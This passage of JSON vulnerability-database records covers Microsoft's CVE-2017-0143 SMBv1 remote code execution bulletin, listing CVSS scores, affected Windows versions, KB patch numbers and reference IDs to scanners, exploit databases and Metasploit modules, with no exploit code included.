"SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:43970", "EDB-ID:41891"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-27786", "1337DAY-ID-29702"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:154690"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": 
["700099.PRM", "SMB_NT_MS17-010.NASL", "700059.PRM", "MS17-010.NASL"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA11902", "KLA10977"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-19T08:49:10", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-19T08:49:10", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3177186", "KBMS16-110, 3187754", "KB3212646", "KB4013198", "KB4012215", "KB4012217", "KB4012213", "KB4013429", "KB3210721", "KB4012212", "KB4012606", "KB3213986", "KB3205409", "KB3210720", "KB4012216", "KB4012214", "KB4012598", "KB3205401"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", 
"msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, 
{"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": 
"KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": 
"KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", 
"kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-19T08:49:10", "differentElements": ["msAffectedSoftware"], "edition": 61}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "f7b4e50f4ef2188508dc09f5f5ce8194", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-19T10:51:44", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": 
"talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891", "EDB-ID:43970"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-27786", "1337DAY-ID-33895", "1337DAY-ID-29702", "1337DAY-ID-33313", "1337DAY-ID-27752"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:146236", "PACKETSTORM:142548"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700099.PRM", "SMB_NT_MS17-010.NASL", "700059.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", 
"RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA11902", "KLA10977"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02", "ICSMA-20-170-01"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-19T10:51:44", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-19T10:51:44", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBMS16-110, 3187754", "KB4012216", "KB4012606", "KB3212646", "KB3177186", "KB4012213", "KB3205401", "KB4012598", "KB4012212", "KB3205409", "KB3210720", "KB4012217", "KB4012214", "KB3213986", "KB4013429", "KB4012215", "KB4013198", "KB3210721"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", 
"kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 
for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-19T10:51:44", "differentElements": ["msAffectedSoftware"], "edition": 62}, {"bulletin": {"id": 
"MS:CVE-2017-0143", "hash": "e82055c0f190318442e2f0bde68f2113", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-19T14:49:48", "history": [], "viewCount": 9, 
"enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:7D1D823549046978FD52257C68DF7801"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:43970", "EDB-ID:41891", "EDB-ID:47456"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-29702", "1337DAY-ID-27613", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:146236", "PACKETSTORM:156196"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": 
["SMB_NT_MS17-010.NASL", "700059.PRM", "MS17-010.NASL", "700099.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10977", "KLA10979"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02", "ICSMA-20-170-01"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-19T14:49:48", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-19T14:49:48", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3177186", "KBMS16-110, 3187754", "KB3212646", "KB4013198", "KB4012215", "KB4012217", "KB4012213", "KB4013429", "KB3210721", "KB4012212", "KB4012606", 